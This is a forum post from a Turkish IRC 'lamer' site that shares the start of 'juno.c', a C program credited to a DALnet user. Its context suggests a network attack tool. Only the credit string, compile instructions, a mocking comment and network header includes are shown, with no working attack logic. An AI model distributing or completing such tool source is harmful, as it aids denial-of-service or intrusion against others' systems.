Türkiye'nin IRCd ve LaMeR Forumu Sitesi
Tags
Author: SatO - Replies: 0 - Views: 2487
Juno.c Arayanlara
[php]char about[] = "juno.c by Darkcode of DALnet\n";

/*
for best results, compile with:
gcc -O2 juno.c -o juno

thanks to bleach for releasing this for me, I'm too lazy to do it myself

P.S I'd just like to send out a big "get out of the closet" to malkman,
for making useless mods to this source that actually make it *less*
effective. Get a life man.
*/

#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>